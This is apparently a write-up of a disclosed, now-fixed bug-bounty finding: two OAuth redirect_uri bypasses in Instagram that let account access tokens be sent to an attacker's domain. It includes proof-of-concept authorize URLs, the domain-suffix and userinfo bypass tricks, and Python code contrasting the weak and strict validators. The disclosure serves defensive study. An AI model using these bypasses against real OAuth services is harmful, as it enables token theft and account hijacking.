Nir Goldshlager, founder of Break Security, found a serious vulnerability in Instagram. A successful attack lets the attacker view the victim's private photos, delete the victim's photos, edit comments and post new photos. He found two ways to hijack an account:
1. Hijack Instagram accounts using the Instagram OAuth endpoint (https://instagram.com/oauth/authorize/)
2. Hijack Instagram accounts using the Facebook OAuth Dialog (https://www.facebook.com/dialog/oauth)
He reported a few issues to Instagram, including the OAuth attacks, but the acquisition had not closed yet and Facebook Security was unable to put their hands on security issues in Instagram, so he waited, waiting like a good white hat. Then Facebook Security sent him a message saying that even though they were unable to fix these issues because the acquisition had not closed yet, they would still pay out for these vulnerabilities.
So, first, he checked Instagram's OAuth protocol documentation: (http://instagram.com/developer/authentication/)
While researching Instagram's security parameters, Nir noticed that Facebook Security had made some impressive progress on their own Instagram OAuth vulnerabilities. They basically blocked access to any and all files, folders and subdomains by validating the redirect_uri parameter.
In addition, redirection was only allowed to go to the owner app's domain.
So an attacker needed to find another way to get past this protection. Further complicating the problem was the fact that an open redirect or XSS on the victim's owner app can't be chained in, because the redirect_uri parameter gives you no access to files or folders on the owner app domain.
Blocked: files, folders and subdomains.
For example, with the owner app domain apigee.com:
Allowed request:
redirect_uri=https://apigee.com
Blocked requests:
redirect_uri=https://www.breaksec.com
redirect_uri=https://a.apigee.com/
redirect_uri=https://apigee.com/x/x.php
redirect_uri=https://apigee.com/%23, ? or any other special character
As it stood, it seemed that the redirect_uri was impervious to OAuth attacks.
While researching, Nir found a sneaky bypass. If the attacker uses a suffix trick on the owner app domain, they can bypass the Instagram OAuth redirect_uri check and have the access_token or code sent to their own domain.
For instance:
Let's say Nir's app client_id in Instagram is 33221863xxx and his domain is breaksec.com.
In this case, the redirect_uri parameter should allow redirection only to his domain (breaksec.com), right? What happens when we change the suffix of the domain to something like:
breaksec.com.mx
In this example, the attacker can have the access_token or code sent straight to breaksec.com.mx, which suggests the check only verified that the redirect host began with the registered domain rather than matching it exactly. For the attack to succeed, of course, the attacker needs to buy the new domain (in this case, breaksec.com.mx).
PoC bypass (fixed by the Facebook Security Team):
https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d&redirect_uri=https://breaksec.com.mx&response_type=token
Game over.
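To make the bypass concrete, here is an added Python example (not code from the original post, and not Instagram's or Facebook's implementation) that reconstructs a redirect_uri validator with the behaviour described above and puts a hardened check beside it. The prefix-matching logic, the registered host breaksec.com and all function names are assumptions for illustration; the example also goes beyond the post by showing that the same loose check lets a userinfo trick (https://breaksec.com@evil.com) through, and it runs the post's own PoC URL through both policies.

```python
from urllib.parse import parse_qs, urlsplit

# Assumed registered owner-app domain for the client_id (as in the post's example).
REGISTERED_HOST = "breaksec.com"


def _split_https(redirect_uri):
    """Parse redirect_uri; return None unless it is an absolute https URL."""
    parts = urlsplit(redirect_uri)
    if parts.scheme.lower() != "https" or not parts.netloc:
        return None
    return parts


def _has_files_or_folders(parts):
    """The 'files, folders and special signs' rule: any path, query or fragment is rejected."""
    return parts.path not in ("", "/") or bool(parts.query) or bool(parts.fragment)


def allowed_prefix_match(redirect_uri, registered_host=REGISTERED_HOST):
    """Hypothetical reconstruction of the weak check: the netloc only has to
    *start with* the registered domain. Subdomains and paths are blocked,
    but 'breaksec.com.mx' (and 'breaksec.com@evil.com') begin with
    'breaksec.com' and therefore pass."""
    parts = _split_https(redirect_uri)
    if parts is None or _has_files_or_folders(parts):
        return False
    return parts.netloc.lower().startswith(registered_host.lower())


def allowed_strict(redirect_uri, registered_host=REGISTERED_HOST):
    """Hardened check: https only, no path/query/fragment, no userinfo or
    port, and the parsed hostname must equal the registered host exactly."""
    parts = _split_https(redirect_uri)
    if parts is None or _has_files_or_folders(parts):
        return False
    try:
        if parts.username is not None or parts.password is not None or parts.port is not None:
            return False
    except ValueError:  # a non-numeric port makes .port raise
        return False
    return (parts.hostname or "") == registered_host.lower()


def check_authorize_request(authorize_url, registered_host=REGISTERED_HOST):
    """Pull redirect_uri out of an /oauth/authorize request and evaluate it
    under both policies. Returns (prefix_match_result, strict_result)."""
    query = parse_qs(urlsplit(authorize_url).query)
    redirect_uri = query.get("redirect_uri", [""])[0]
    return (allowed_prefix_match(redirect_uri, registered_host),
            allowed_strict(redirect_uri, registered_host))


if __name__ == "__main__":
    # The PoC URL from the post: the attacker's redirect_uri is breaksec.com.mx.
    poc = ("https://instagram.com/oauth/authorize/?client_id=33221863eec546659f2564dd71a8a38d"
           "&redirect_uri=https://breaksec.com.mx&response_type=token")
    print("PoC (prefix, strict):", check_authorize_request(poc))
    for uri in ["https://breaksec.com", "https://www.breaksec.com",
                "https://breaksec.com/x/x.php", "https://breaksec.com/%23",
                "https://breaksec.com.mx", "https://breaksec.com@evil.com"]:
        print(f"{uri:32} prefix={allowed_prefix_match(uri)!s:5} strict={allowed_strict(uri)}")
```

The strict variant compares the parsed hostname, not the raw netloc, so a registered domain can never be a prefix of, or smuggled into the userinfo of, some other host. The same exact-host rule applies to any parameter that decides where a token is delivered, including the next parameter in the second bug below.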
Bug 2.
For this bug, Nir used the Instagram client_id value through the Facebook OAuth dialog (https://www.facebook.com/dialog/oauth).
When you use the Instagram app, it can be integrated with Facebook.
For example:
When a user wants to share their Instagram photos to Facebook, they allow this integration to take place, and Facebook shows the permission prompt:
Instagram would like to access your public profile and friend list
Nir discovered that an attacker could use practically any domain in the redirect_uri / next parameter. This was really problematic, and he doesn't know why it happened, but it worked: you could use virtually any domain in the redirect_uri / next parameter together with the Instagram client_id.
This effectively allows the attacker to steal the access_token of any Instagram user.
With the access_token the attacker can post on the victim's behalf on their Facebook account and access their private friends list.
PoC (Facebook has already fixed this issue):
https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&next=http://files.nirgoldshlager.com&display=page&fbconnect=1&method=permissions.request&response_type=token